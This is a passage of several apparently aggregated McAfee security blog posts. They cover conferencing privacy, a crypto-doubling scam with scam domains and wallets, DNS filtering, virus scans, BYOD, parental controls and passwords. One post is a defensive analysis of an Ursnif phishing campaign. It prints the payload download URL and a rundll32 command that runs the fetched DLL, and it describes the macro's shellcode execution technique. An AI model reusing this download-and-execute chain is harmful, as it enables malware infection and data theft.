As millions of people around the world practice social distancing and work their office jobs from home, video conferencing has quickly become the new norm. Whether you’re attending regular work meetings, partaking in a virtual happy hour with friends, or catching up with extended family across the globe, video conferencing is a convenient alternative to many of the activities we can no longer do in real life. But as the rapid adoption of video conferencing tools and apps occurs, is security falling by the wayside?

Avoid Virtual Party Crashers

One security vulnerability that has recently made headlines is the ability for uninvited attendees to bombard users’ virtual meetings. How? According to Forbes, many users have posted their meeting invite links on social media sites like Twitter. An attacker can simply click on one of these links and interrupt an important conference call or meeting with inappropriate content.  

Ensure Data is in the Right Hands

Online conferencing tools allow users to hold virtual meetings and share files via chat. But according to Security Boulevard, communicating confidential business information quickly and privately can be challenging with these tools. For example, users are not always immediately available, even when working from home. In fact, many parents are simultaneously doubling as working parents and teachers with the recent closure of schools and childcare providers. If a user needs to share private information with a coworker but they are unable to connect by video or phone, they might revert to using a messaging platform that lacks end-to-end encryptiona feature that prevents third-party recipients from seeing private messages. This could lead to leaks or unintended sharing of confidential data, whether personal or corporate. What’s more, the lack of using a secure messaging platform could present a hacker with an opportunity to breach a victim’s data or deviceDepending on the severity of this type of breach, a victim could be at risk of identity theft 

Pay Attention to Privacy Policies

With the recent surge of new video conferencing users, privacy policies have been placed under a microscope. According to WIRED, some online conferencing tools have had to update their policies to reflect the collection of user information and meeting content used for advertising or other marketing efforts. Another privacy concern was brought to light by a video conferencing tool’s attention-tracking feature. This alerts the virtual meeting host when an attendee hasn’t had the meeting window in their device foreground for 30 seconds, resulting in users feeling that their privacy has been compromised.  

How to Secure Video Conferences

As users become accustomed to working from home, video conferencing tools will continue to become a necessary avenue for virtual communication. But how can users do so while putting their online security first? Follow these tips to help ensure that your virtual meetings are safeguarded:  

Do your research

There are plenty of video conferencing tools available online. Before downloading the first one you see, do your research and check for possible security vulnerabilities around the tools. Does the video conferencing tool you’re considering use end-to-end encryption? This ensures that only meeting participants have the ability to decrypt secure meeting content. Additionally, be sure to read the privacy policies listed by the video conferencing programs to find the one that is the most secure and fits your needs.  

Make your meetings password protected

To ensure that only invited attendees can access your meeting, make sure they are password protected. For maximum safety, activate passwords for new meetings, instant meetings, personal meetings, and people joining by phone. 

Block users from taking control of the screen

To keep users (either welcome or unwelcome) from taking control of your screen while you’re video conferencing, select the option to block everyone except the host (you) from screen sharing.  

Turn on automatic updates

By turning on automatic updates, you are guaranteed to have all the latest security patches and enhancements for your video conferencing tool as soon as they become available.  

The post How Secure Is Video Conferencing? appeared first on McAfee Blog.

Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency

By McAfee

By Oliver Devane 

Update: In the past 24 hours (from time of publication)  McAfee has identified 15 more scam sites bringing the total to 26. The combined value of the wallets shared on these sites is over $1,300,000 which is an increase of roughly $1,000,000 since this blog was last published. This highlights the scale of this current scam campaign. The table within this blog has been updated to include the new sites and crypto-wallets.

McAfee has identified several Youtube channels which were live-streaming a modified version of a live stream called ‘The B Word’ where Elon Musk, Cathie Wood, and Jack Dorsey discuss various aspects of cryptocurrency.  

The modified live streams make the original video smaller and put a frame around it advertising malicious sites that it claims will double the amount of cryptocurrency you send them. As the topic of the video is on cryptocurrency it adds some legitimacy to the websites being advertised.  

The original video is shown below on the left and a modified one which includes a reference to a scam site is shown on the right.  

We identified several different streams occurring at a similar same time. The images of some are shown below: 

The YouTube streams advertised several sites which shared a similar theme. They claim to send cryptocurrency worth double the value which they’ve received. For example, if you send 1BTC you will receive 2BTC in return. One of the sites frequently asked questions (FAQ) is shown below: 

Here are some more examples of the scam sites we discovered: 

The sites attempt to trick the visitors into thinking that others are sending cryptocurrency to it by showing a table with recent transactions. This is fake and is generated by JavaScript which creates random crypto wallets and amounts and then adds these to the table. 

The wallets associated with the malicious sites have received a large number of transactions with a combined value of $280,000 as of 5 PM UTC on the 5th of May 2022 

Scam Site  Crypto Type  Wallet  Value as on 5PM UTC 5th May 2022 
22ark-invest[.]org  ETH  0x820a78D8e0518fcE090A9D16297924dB7941FD4f  $25,726.46 
22ark-invest[.]org  BTC  1Q3r1TzwCwQbd1dZzVM9mdFKPALFNmt2WE  $29,863.78 
2xEther[.]com  ETH  0x5081d1eC9a1624711061C75dB9438f207823E694  $2,748.50 
2x-musk[.]net  ETH  0x18E860308309f2Ab23b5ab861087cBd0b65d250A  $10,409.13 
2x-musk[.]net  BTC  17XfgcHCfpyYMFdtAWYX2QcksA77GnbHN9  $4,779.47 
arkinvest22[.]net  ETH  0x2605dF183743587594A3DBC5D99F12BB4F19ac74  $11,810.57 
arkinvest22[.]net  BTC  1GLRZZHK2fRrywVUEF83UkqafNV3GnBLha  $5,976.80 
doublecrypto22[.]com  ETH  0x12357A8e2e6B36dd6D98A2aed874D39c960eC174  $0.00 
doublecrypto22[.]com  BTC  1NKajgogVrRYQjJEQY2BcvZmGn4bXyEqdY  $0.00 
elonnew[.]com  ETH  0xAC9275b867DAb0650432429c73509A9d156922Dd  $0.00 
elonnew[.]com  BTC  1DU2H3dWXbUA9mKWuZjbqqHuGfed7JyqXu  $0.00 
elontoday[.]org  ETH  0xBD73d147970BcbccdDe3Dd9340827b679e70d9d4  $18,442.96 
elontoday[.]org  BTC  bc1qas66cgckep3lrkdrav7gy8xvn7cg4fh4d7gmw5  $0.00 
Teslabtc22[.]com  ETH  0x9B857C44C500eAf7fAfE9ed1af31523d84CB5bB0  $27,386.69 
Teslabtc22[.]com  BTC  18wJeJiu4MxDT2Ts8XJS665vsstiSv6CNK  $17,609.62 
tesla-eth[.]org  ETH  0x436F1f89c00f546bFEf42F8C8d964f1206140c64  $5,841.84 
tesla-eth[.]org  BTC  1CHRtrHVB74y8Za39X16qxPGZQ12JHG6TW  $132.22 
teslaswell[.]com  ETH  0x7007Fa3e7dB99686D337C87982a07Baf165a3C1D  $9.43 
teslaswell[.]com  BTC  bc1qdjma5kjqlf7l6fcug097s9mgukelmtdf6nm20v  $0.00 
twittergive[.]net  ETH  0xB8e257C18BbEC93A596438171e7E1E77d18671E5  $25,918.90 
twittergive[.]net  BTC  1EX3dG9GUNVxoz6yiPqqoYMQw6SwQUpa4T  $99,123.42 

Scammers have been using social media sites such as Twitter and Youtube to attempt to trick users into parting ways with their cryptocurrency for the past few years. McAfee urges its customers to be vigilant and if something sounds too good to be true then it is most likely not legitimate.  

Our customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor  

Type  Value  Product  Blocked 
URL – Crypto Scam  twittergive[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  tesla-eth[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  22ark-invest[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  2xEther[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  Teslabtc22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  elontoday[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  elonnew[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  teslaswell[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  2x-musk[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  doublecrypto22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  arkinvest22[.]net  McAfee WebAdvisor  YES 

 

The post Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency appeared first on McAfee Blog.

Advancing our Secure Home Platform with DNS over HTTPS

By McAfee

On the internet, the Domain Name System (DNS) is the way regular people access websites such as ESPN.com or BBC.com. However, the internet uses a unique series of Internet Protocol (IP) addresses to access websites which are tricky for humans to remember.  Web browsers typically interact with websites through IP addresses, and DNS translates websites into IP addresses so browsers can access Internet resources. Historically, this has been done in the form of unencrypted clear text that ISPs and security providers such as McAfee can read and act upon to sort through risky websites or to improve network performance and intelligence.

However, this also opens up vulnerabilities of security and privacy.  As an industry, (Apple, Microsoft, Google, and others) participants are moving toward encrypting this traffic to and from DNS servers with protocols such as DNS over TLS (DoT) and DNS over HTTPS (DoH). Unless the ISP offers DoT/DoH decryption (translation) capabilities, traffic could go directly to outside DNS providers such as Google DNS and Cloudflare who do. Without this visibility, unsafe websites cannot be seen and blocked using DNS filtering technology. Customers can visit sites created by criminals that can trick them to steal their account credentials, download ransomware, or show inappropriate content to their kids.

We’re advancing our Secure Home Platform (SHP) technology to future proof the ability for our partners to protect their customers, their families, and their connected home devices. McAfee is the first in the market to build and introduce this technology. McAfee and OpenXchange have partnered to provide an integration of a forwarder/translator (PowerDNS) with the home router-based SHP product that will make it possible to keep the traffic within the ISP network, as shown in the diagram below – allowing DNS filtering even in encrypted DNS environments.

The ISP can continue to read the traffic and stands to benefit in several ways:

  • Continued ability to offer security protections such as anti-virus, malware filtering, blocking phishing attempts, distinguishing legitimate services, content caching, and parental controls. McAfee Secure Home Platform protects customers/homes from potential harm from an average of 70 potential threats per week
  • Helps defend against DDoS, man-in-the-middle, and botnet attacks
  • More streamlined DoH connections – more private and secure, especially important to sophisticated consumers
  • Locate content based on user demand, and hence improve performance
  • The ISP is not burdened by support issues caused by traffic going outside their network and purview, e.g., to a third-party DNS provider – fewer unhappy customers and support calls due to fewer security incidents.
  • Help comply with Government regulations – block bad actors, terrorist websites, illegal file-sharing, child abuse, national security, court-ordered regulatory blocklists, ban foreign gambling, etc.

Consumers in turn benefit from these additional capabilities that ISPs can provide in security, privacy, and performance.

If you are interested in McAfee’s exciting new DoT-DoH technology for the Secure Home Platform, please contact your McAfee Account Representative for further details.

The post Advancing our Secure Home Platform with DNS over HTTPS appeared first on McAfee Blog.

How To Do A Virus Scan

By McAfee

Whether you think you might have a virus on your computer or devices, or just want to keep them running smoothly, it’s easy to do a virus scan. How to check for viruses depends on the software and device you have, so we’ll go through everything you need to know to run a scan effectively and keep your computers, phones and tablets in tip-top shape.

Do You Need a Virus Scan?

First, let’s cover a few of the telltale signs your device might have a virus. Is your computer or device acting sluggish or having a hard time booting up? Have you noticed missing files or a lack of storage space? Have you noticed emails or messages sent from your account that you did not write? Perhaps you’ve noticed changes to your browser homepage or settings? Or maybe, you’re seeing unexpected pop-up windows, or experiencing crashes and other program errors. These are all examples of signs that you may have a virus, but don’t get too worried yet, because many of these issues can be resolved with a virus scan.

What Does a Virus Scan Do?

Each antivirus program works a little differently, but in general the software will look for known malware that meets a specific set of characteristics. It may also look for variants of these known threats that have a similar code base. Some antivirus software even checks for suspicious behavior. If the software comes across a dangerous program or piece of code, it removes it. In some cases, a dangerous program can be replaced with a clean one from the manufacturer.

How to Check for Viruses

The process of checking for viruses depends on the device type and its operating system. Check out these tips to help you scan your computers, phones and tablets.

On a Windows computer

If you use Windows 10, go into “Settings” and look for the “Updates & Security” tab. From there you can locate a “Scan Now” button.

Of course, many people have invested in more robust antivirus software that has a high accuracy rate and causes less drain on their system resources, such as McAfee Total Protection. To learn how to run a virus scan using your particular antivirus software, search the software’s help menu or look online for instructions.

On a Mac computer

Mac computers don’t have a built-in antivirus program, so you will have to download security software to do a virus scan. There are some free antivirus applications available online, but we recommend investing in trusted software that can protect you from a variety of threats. Downloading free software and free online virus scans can be risky, since cybercriminals know that this is a good way to spread malware.

Whichever program you choose, follow their step-by-step instructions on how to perform a virus scan, either by searching under “help” or looking it up on their website.

On smartphones and tablets

Yes, you can get a virus on your phone or tablet, although they are less common than on computers. However, the wider category of mobile malware is on the rise and your device can get infected if you download a risky app, click on an attachment in a text message, visit a dangerous webpage, or connect to another device that has malware on it.

Fortunately, you can protect your devices with mobile security software. It doesn’t usually come installed, so you will have to download an application and follow the instructions.

Because the Android platform is an open operating system, there are a number of antivirus products for Android devices, that allows you to do a virus scan.

Apple devices are a little different because they have a closed operating system that doesn’t allow third parties to see their code. Although Apple has taken other security precautions to reduce malware risks, such as only allowing the installation of apps from Apple’s official app store, these measures aren’t the same as an antivirus program.

For more robust protection on your Apple devices, you can install mobile security software to protect the private data you have stored on your phone or tablet, such as contacts, photos and messages.

All-In-One Protection:

If safeguarding all your computers and devices individually sounds overwhelming, you can opt for a comprehensive security product that protects computers, smartphones and tablets from a central control center, making virus prevention a breeze.

Why are virus scans so important?

New online threats emerge every day, putting our personal information, money and devices at risk. In the first quarter of 2019 alone McAfee detected 504 new threats per minute, as cybercriminals employed new tactics. That’s why it is essential to stay ahead of these threats by using security software that is constantly monitoring and checking for new known threats, while safeguarding all of your sensitive information. Virus scans are an essential part of this process when it comes to identifying and removing dangerous code.

How often should you run a virus scan?

Most antivirus products are regularly scanning your computer or device in the background, so you will only need to start a manual scan if you notice something suspicious, like crashes or excessive pop-ups. You can also program regular scans on your schedule.

Preventing Viruses

Of course, the best protection is to avoid getting infected in the first place. Here are a few smart tips to sidestep viruses and other malware:

  • Learn how to surf safely so you can avoid risky websites, links and messages. This will go a long way in keeping you virus-free.
  • Never click on spammy emails or text messages. These include unsolicited advertisements and messages from people or companies you don’t know.
  • Keep the software on your computers and devices up to date. This way you are protected from known threats, such as viruses and other types of malware.
  • Invest in comprehensive security software that can protect all of your devices, such as McAfee LiveSafe.
  • Stay informed on the latest threats, so you know what to look out for. The more you know about the latest scams, the easier they will be to spot and avoid.

The post How To Do A Virus Scan appeared first on McAfee Blog.

Phishing Campaigns featuring Ursnif Trojan on the Rise

By McAfee Labs

Authored by Jyothi Naveen and Kiran Raj

McAfee Labs have been observing a spike in phishing campaigns that utilize Microsoft office macro capabilities. These malicious documents reach victims via mass spam E-mail campaigns and generally invoke urgency, fear, or similar emotions, leading unsuspecting users to promptly open them. The purpose of these spam operations is to deliver malicious payloads to as many people as possible.

A recent spam campaign was using malicious word documents to download and execute the Ursnif trojan. Ursnif is a high-risk trojan designed to record various sensitive information. It typically archives this sensitive data and sends it back to a command-and-control server.

This blog describes how attackers use document properties and a few other techniques to download and execute the Ursnif trojan.

Threat Summary

  • The initial attack vector is a phishing email with a Microsoft Word document attachment.
  • Upon opening the document, VBA executes a malicious shellcode
  • Shellcode downloads the remote payload, Ursnif, and invokes rundll32.exe to execute it.

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, Word downloads a DLL (Ursnif payload). The Ursnif payload is then executed using rundll32.exe

Figure 1- flowchart of infection chain
Figure 1- flowchart of infection chain

Word Analysis

Macros are disabled by default and the malware authors are aware of this and hence present an image to entice the victims into enabling them.

Figure 2- Image of what the user sees upon opening the document
Figure 2- Image of what the user sees upon opening the document

VBA Macro Analysis of Word Document

Analyzing the sample statically with ‘oleId’ and ‘olevba’ indicates the suspicious vectors..

Figure 3- Oleid output
Figure 3- Oleid output
Figure 4- Olevba output
Figure 4- Olevba output

The VBA Macro is compatible with x32 and x64 architectures and is highly obfuscated as seen in Figure-5

Figure 5- Obfuscated VBA macro
Figure 5- Obfuscated VBA macro

To get a better understanding of the functionality, we have de-obfuscated the contents in the 2 figures shown below.

Figure 6- De-obfuscated VBA macro (stage 1)
Figure 6- De-obfuscated VBA macro (stage 1)
Figure 7- De-obfuscated VBA macro (stage 2)
Figure 7- De-obfuscated VBA macro (stage 2)

An interesting characteristic of this sample is that some of the strings like CLSID, URL for downloading Ursnif, and environment variables names are stored in custom document properties in reverse. As shown in Figure-7, VBA function “ActiveDocument.CustomDocumentProperties()” is used to retrieve the properties and uses “StrReverse” to reverse the contents. 

We can see the document properties in Figure-8  

Figure 8- Document properties
Figure 8- Document properties

Payload Download and Execution: 

The malicious macro retrieves hidden shellcode from a custom property named “Company” using the “cdec” function that converts the shellcode from string to decimal/hex value and executes it. The shellcode is shown below. 

Figure 9- Raw Company property
Figure 9- Raw Company property

The shellcode is written to memory and the access protection is changed to PAGE_EXECUTE_READWRITE. 

Figure 10- Code of VirtualProtect
Figure 10- Code of VirtualProtect
Figure 11- Shellcode’s memory and protection after calling VirtualProtect()
Figure 11- Shellcode’s memory and protection after calling VirtualProtect()

After adding the shellcode in memory, the environment variable containing the malicious URL of Ursnif payload is created. This Environment variable will be later used by the shellcode. 

Figure 12- Environment variable set in Winword.exe space
Figure 12- Environment variable set in Winword.exe space

The shellcode is executed with the use of the SetTimer API. SetTimer creates a timer with the specified time-out value mentioned and notifies a function when the time is elapsed. The 4th parameter used to call SetTimer is the pointer to the shellcode in memory which will be invoked when the mentioned time is elapsed. 

Figure 13- SetTimer function (Execution of shellCode)
Figure 13- SetTimer function (Execution of shellCode)

The shellcode downloads the file from the URL stored in the environmental variable and stores it as ” y9C4A.tmp.dll ” and executes it with rundll32.exe. 

URL  hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/ 
CMD  rundll32 “C:\Users\user\AppData\Local\Temp\y9C4A.tmp.dll”,DllRegisterServer 
Figure 14- Exports of Downloaded DLL
Figure 14- Exports of Downloaded DLL

After successful execution of the shellcode, the environment variable is removed. 

Figure 15- Removal of Environment Variable
Figure 15- Removal of Environment Variable

IOC 

TYPE  VALUE  PRODUCT  DETECTION NAME 
Main Word Document  6cf97570d317b42ef8bfd4ee4df21d217d5f27b73ff236049d70c37c5337909f  McAfee LiveSafe and Total Protection  X97M/Downloader.CJG 
Downloaded dll  41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547  McAfee LiveSafe and Total Protection  Ursnif-FULJ 
URL to download dll  hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/  WebAdvisor  Blocked 

MITRE Attack Framework 

Technique ID  Tactic  Technique Details  Description 
T1566.001  Initial Access  Spear phishing Attachment  Manual execution by user 
T1059.005  Execution  Visual Basic  Malicious VBA macros 
T1218.011  Defense Evasion  Signed binary abuse  Rundll32.exe is used 
T1027  Defense Evasion  Obfuscation techniques  VBA and powershell base64 executions 
T1086  Execution  Powershell execution  PowerShell command abuse 

 Conclusion 

Macros are disabled by default in Microsoft Office applications, we suggest keeping it that way unless the document is received from a trusted source. The infection chain discussed in the blog is not limited to Word or Excel. Further threats may use other live-off-the-land tools to download its payloads.  

McAfee customers are protected against the malicious files and sites detailed in this blog with McAfee LiveSafe/Total Protection and McAfee Web Advisor. 

The post Phishing Campaigns featuring Ursnif Trojan on the Rise appeared first on McAfee Blog.

WFH Unprotected: How Organizations Can Keep Their Employees and Their Business Safer

By McAfee

The devices employees use as they work from home could be the ones that put their companies at risk.

With businesses continuing to support remote and hybrid workplaces, more employees are connecting more of their personal devices to corporate networks, yet these devices aren’t always well protected from malware, breaches, and theft—which can affect them and the companies

they work for.

Prior to the pandemic, a major topic for employee and business security was BYOD, or “bring your own device.” And it remains so. That catchy little abbreviation took root several years ago as many employees started bringing their own devices to work for both personal and business use, whether that was their smartphone for company calls and email or swapping files once in a while with an external drive or a USB stick.

The argument for BYOD is that it potentially increases employee productivity by allowing people to use the devices they’re familiar with—plus that company can save on costs by having employees bring their own tech into the office. However, there’s a flip side. Because these devices can and often do connect to sensitive corporate resources and data, they can potentially compromise those very same resources and data. Unless they have strong security in place, which they often do not. Employees simply don’t always protect their own devices.

Our most recent global research shows that only 68% of adults say that they protect their laptops with basic antivirus protection. Note that basic antivirus does not include comprehensive security software that also protects them from the pandemic and post-pandemic rise in account theft, ransomware, email fraud, and phishing attacks. With this, only 68% of adults employ baseline protection, let alone more thorough protections beyond that. 

This figure drops dramatically when it comes to protecting their smartphones, classically the leading BYOD device in the corporate landscape. Here, only 41% of adults said they protect their phones with basic antivirus. Moreover, only 56% said they protect their smartphone with a password or passcode to unlock it—making nearly half of them an open book to cyber crooks in the event of loss or theft. 

Now, with remote and hybrid workplaces becoming more commonplace, BYOD gets all that much more complicated. Businesses are now faced with an unprecedented number of BYOD devices on their networks. In the U.S. alone, a Gallup poll found that half of the full-time workforce was “remote capable,” some 60 million people in all.  

Of them, 53% said they expect to work in a hybrid model moving forward and another 24% to work fully remotely. That means somewhere around 46 million workers in the U.S. will work remotely in some form or fashion and will likely use one or more of their own devices to do so—a clear concern for any security-minded business if these employee devices remain unprotected.  

The realities of BYOD and WFH 

In an ideal world, employees would stick to some hard and fast rules about device usage. They’d do their work on one laptop and then use another for streaming shows, doing their shopping, playing games, managing their finances and so on. Yet that doesn’t appear to be the case.  

A recent global study found that 55% of remote workers use a personal laptop or smartphone for work at least part of the time. Moreover, this begs the question if the employee is the only one using that BYOD device. After all, they’re likely working in their own home, where other family members may use that device to some extent as well, which adds yet more security risks for businesses. With multiple users on a single device, the additional browsing, downloading, emailing, and shopping could expose that device to more security risks than from a single user alone. 

Unlike company-issued devices, employee-owned devices aren’t subject to the centralized policies and protections that corporate IT can put in place. This leads to devices on the corporate network that may be without up-to-date antivirus protection, have malicious apps on them, or use browsers with compromised extensions that illicitly gather data on their users. 

Once again, with employees sometimes taking lax, if any security measures to protect their devices, this can present serious risks to the business, such as the dramatic rise in business email compromise. As reported by the Federal Bureau of Investigation (FBI), businesses lost $2.4 billion in 2021 to this form of scam alone. Meanwhile, phishing attacks, device theft, and credential theft all remain painfully common forms of attack on small and mid-sized businesses. 

How online protection for employees makes for a more secure business 

One way businesses can address these issues is by helping employees do what they haven’t done for themselves—provide them with comprehensive online protection software as a company benefit. 

Comprehensive online protection goes beyond basic antivirus (which as we’ve seen, only 68% of people use). It covers the three pillars of security—privacy, identity, and device security, and by protecting those three things for their employees on their BYOD devices, companies can then protect themselves.  

A brief list illustrates several of the top ways online protection for remote employees can help keep the business secure: 

1) Protect company information as it travels 

If your company doesn’t already support one, employees can use a VPN to create an encrypted tunnel when they connect to the company network, which makes it highly difficult for bad actors to intercept that traffic. Our secure VPN uses bank-grade AES 256-bit encryption to help keep data and information safe. 

2) Shield company data and resources from attacks 

With one bad click, a phishing attack in email, text, or direct message may give an attacker access to login credentials or to install malware known as a keylogger that can likewise steal usernames and passwords. Safe web browsing features found in online protection can help sidestep these attacks before they happen with clear warnings of risky websites, links, files, and other attachments. 

3) Strong, unique passwords for all 

When it comes to employee passwords, no two should be alike. Yet with dozens of logins of their own, in addition to the ones they use exclusively for work, that’s a rule few people follow. A password manager can help. It can store, auto-fill, and even generate strong, unique passwords for each account—across computers, laptops, and smartphones. 

4) Digitally shred sensitive documents permanently 

Employees can permanently delete sensitive files with an application such as McAfee Shredder™, which removes files so that thieves can’t access them. (Quick fact: deleting files in your trash doesn’t actually delete them in the truest sense. They’re still there until they’re “shredded” or otherwise overwritten such that they can’t be restored.) 

5) Device protection that goes beyond the basics 

Absolutely, antivirus is a must. Comprehensive online protection will include that, and much more. Ours offers that in addition to protection that safeguards your employee’s identity and privacy—along with a personalized Protection Score that checks the health of their online protection and provides simple steps to improve their security. 

Think about theft and loss as well 

Beyond online protection software, is remote locking and wiping of devices. We’ve mentioned physical loss and theft of devices as a significant security issue. Many laptops and mobile devices offer location tracking services to help locate a lost device—and yet others allow the owner to remotely lock or even wipe the contents of that device if they fear it’s lost for good or fallen into the wrong hands.  

Showing employees how to enable and use these features can further protect all parties involved in such a worst-case scenario. Apple provides iOS users with a step-by-step guide for remotely wiping devices and Google offers up a guide for Android users as well. For laptops, Microsoft and Apple users can enable the following settings:  

  • Windows: Enable in Settings > Update & Security > Find my device 
  • macOS: Setup iCloud on your device. Enable via Settings > Your Name > iCloud > Find My Mac 

Online protection—good for employees, good for business 

By providing employees with comprehensive online protection that complements the security measures the company already has in place, they get the benefit of a far safer time online for themselves. Potentially their families as well. In turn, because they’re more secure, the business is more secure—an important point to consider when millions are still working from home on their BYOD devices.  

The post WFH Unprotected: How Organizations Can Keep Their Employees and Their Business Safer appeared first on McAfee Blog.

Can Parental Controls Can Help You Create Good Habits?

By Alex Merton-McCann

Molding and shaping our kids while we can is every parent’s dream. When kids are young – and sweet! – they are far more inclined to take on board our advice and lovingly imposed rules. Oh, how I miss those days!! And in a nutshell – that’s what a good set of parental controls can do for you and your kids. In my opinion, parental controls can absolutely help you create good habits but it’s essential that they are accompanied by an invested parent who’s keen to help their kids navigate the online world. 

What Can Parental Controls Do? 

With Aussie kids spending at least 5 hours online a day, it’s no secret that they can be exposed to a broad range of people, websites and themes – some potentially quite disturbing. And with most kids sporting an internet-connected phone plus a laptop, there’s no limit to what they can access – and usually when you aren’t around. 

I like to think of parental controls as another way of helping establish healthy habits and good decision-making strategies with your kids. For example, if you have told your kids there is no screen time before bed, then you are able to use Parental Controls to make that a reality. And if you have agreed that they are able to use only certain apps or social media platforms then Parental Controls can also make this happen by blocking access if they deviate. I believe that over time, these routines, and boundaries simply become part of your child’s day-to-day life and become good habits. 

McAfee’s Parental Controls, called Safe Family, can also let you view your kids’ activity online and let you know where your kids are at all times. How good??    

Doesn’t It Take Just 21 Days To Form A Habit? 

While it’s commonly believed that it takes just 21 days to form a habit, courtesy of Dr Maxwell Maltz in the 1960’s, more up-to-date research shows that it could take considerably longer. In fact, research conducted in 2010 by Health Psychology Researcher Philippa Lally at The University College in London shows that it takes around 2 months or 66 days to be precise to make a new habit stick! 

And while I love the idea that we could help our kids adopt new positive habits in just 2 months, I think we need to keep it real. Fear of missing out (FOMO) coupled with the lure of their shiny devices might mean that it takes a little more than 66 days to make a change, particularly if you are trying to modify their current usage as opposed to starting from scratch. 

Nothing Replaces The Role Of Being A Proactive Digital Parenting 

There is no-one that better understands just how time poor parents can be. Having spent the last 20 plus years rearing 4 boys and working, I feel like I’ve earnt the time poor t-shirt! So, understandably, many parents feel like they just don’t have the ‘band with’ to take on much more so digital parenting is often put in the too hard basket. And I totally get it!    

But using parental controls without some knowledge of your kids’ digital world, is a little like filling your car with petrol but not worrying about the oil. It will eventually be a problem! 

My Top 3 Digital Parenting Non-Negotiables 

So, I’m going to break it down for you. Digital parenting doesn’t have to be overwhelming, particularly if you break it down. So, in a quest to keep it simple, here are 4 things you can do to up your digital parenting game: 

1. As Soon as Your Kids Start Using Devices, Start Talking Cybersafety 

The day your child picks up a device is the day you start talking about cybersafety. If this is when they are 18 months of age, then that’s when you start. Always ensure the messages are age-appropriate and keep them simple. You could start with:  

  • “Remember, daddy/mummy chooses the game” 
  • “Let’s keep your name private online.” To help with this, why not create an online nickname for them? 
  • “Make sure you’re sitting near (mum/dad/nana) when you are using the iPad.” 

And when your kids get older, weave in more age-appropriate messages, such as: 

  • “Online friends aren’t real friends” 
  • “If you wouldn’t do it in person then don’t do it online” 
  • “Think before you post” 

Knitting cybersafety messages into your family dialogue needs to also become automatic. Talk about it just like you would sun safety or road safety. And why not share stories around the dinner table about your own online experiences or even relevant news stories to engage them in a dialogue. 

2. Create a Family Digital Contract 

I love the idea of a clear contract between parents and kids that details your expectations about their online behaviour and technology use. It’s a great way of developing a set of guidelines that will help them navigate the risks associated with being online. Now, this agreement should definitely be a family exercise so ensure your kids are invested in the process too. If you want a starting point, check out this one from The Modern Parent here 

3. Commit to Understanding Your Child’s Digital World 

Taking some time to understand how your child spends their time online is the best way of truly understanding the risks and challenges they face. So, join ALL the social media platforms your kids are on, play their games and download their messaging apps. You will develop a better understanding of how to manage privacy settings and the language/online culture that is a big part of your child’s life. And the best part – if they know you understand their world, I have no doubt that you will develop a little ‘tech cred’ which mean that they will be more likely to come to you with any issues or problems that may face online. Awesome! 

Get Technology Working for You 

There is some amazing technology available that makes this digital parenting thing a heck of a lot easier and that includes Parental Controls. McAfee’s Safe Family is a comprehensive parental controls solution that lets you monitor and block apps and websites, manage screen time, see where your kid’s devices are at all times, and more, giving you peace of mind in an ever-mobile world. The perfect partner to an invested parent! 

Parental Controls can be an awesome way of helping your kids establish positive habits around their tech use, but they are even more impactful when combined with an invested parent who has got a good handle on the online world. So, by all means, invest in Parental Control software but also commit to ramping up your digital parenting game – it’s the best way to help set up your kids for a safe and positive experience online. And isn’t that every digital parent’s dream! 

Take Care 

Alex 😊 

The post Can Parental Controls Can Help You Create Good Habits? appeared first on McAfee Blog.

5 Tips For Creating Bulletproof Passwords

By McAfee

While biometric tools like facial ID and fingerprints have become more common when it comes to securing our data and devices, strong passwords still play an essential part in safeguarding our digital lives.

This can be frustrating at times, since many of us have more accounts and passwords than we can possibly remember. This can lead us to dangerous password practices, such as choosing short and familiar passwords, and repeating them across numerous accounts. But password safety doesn’t have to be so hard. Here are some essential tips for creating bulletproof passwords.

Remember, simple is not safe

Every year surveys find that the most popular passwords are as simple as  “1234567” and just “password.” This is great news for the cybercrooks, but really bad news for the safety of our personal and financial information.

When it comes to creating strong passwords, length and complexity matter because it makes them harder to guess, and harder to crack if the cybercriminal is using an algorithm to quickly process combinations. The alarming truth is that passwords that are just 7 characters long take less than a third of a second to crack using these “brute force attack” algorithms.

Tricks:

  • Make sure that your passwords are at least 12 characters long and include numbers, symbols, and upper and lowercase letters.
  • Try substituting numbers and symbols for letters, such as zero for “O”, or @ for “A”.
  • If you’re using internet-connected devices, like IP cameras and interactive speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

Keep it impersonal

Passwords that include bits of personal information, such as your name, address, or pet’s name, make them easier to guess. This is especially true when we share a lot of personal information online. But you can use personal preferences that aren’t well known to create strong passphrases.

Tricks:

  • Try making your password a phrase, with random numbers and characters. For instance, if you love crime novels you might pick the phrase: ILoveBooksOnCrime
    Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as: 1L0VEBook$oNcRIM3!
  • If you do need to use personal information when setting up security questions, choose answers that are not easy to find online.
  • Keep all your passwords and passphrases private.

Never reuse passwords

If you reuse passwords and someone guesses a password for one account, they can potentially use it to get into others. This practice has gotten even riskier over the last several years, due to the high number of corporate data breaches. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts.

Tricks:

  • Use unique passwords for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. These too can be compromised, and if you use the same password for more sensitive accounts, they too are at risk.
  • If a website or monitoring service you use warns you that your details may have been exposed, change your password immediately.

Employ a password manager

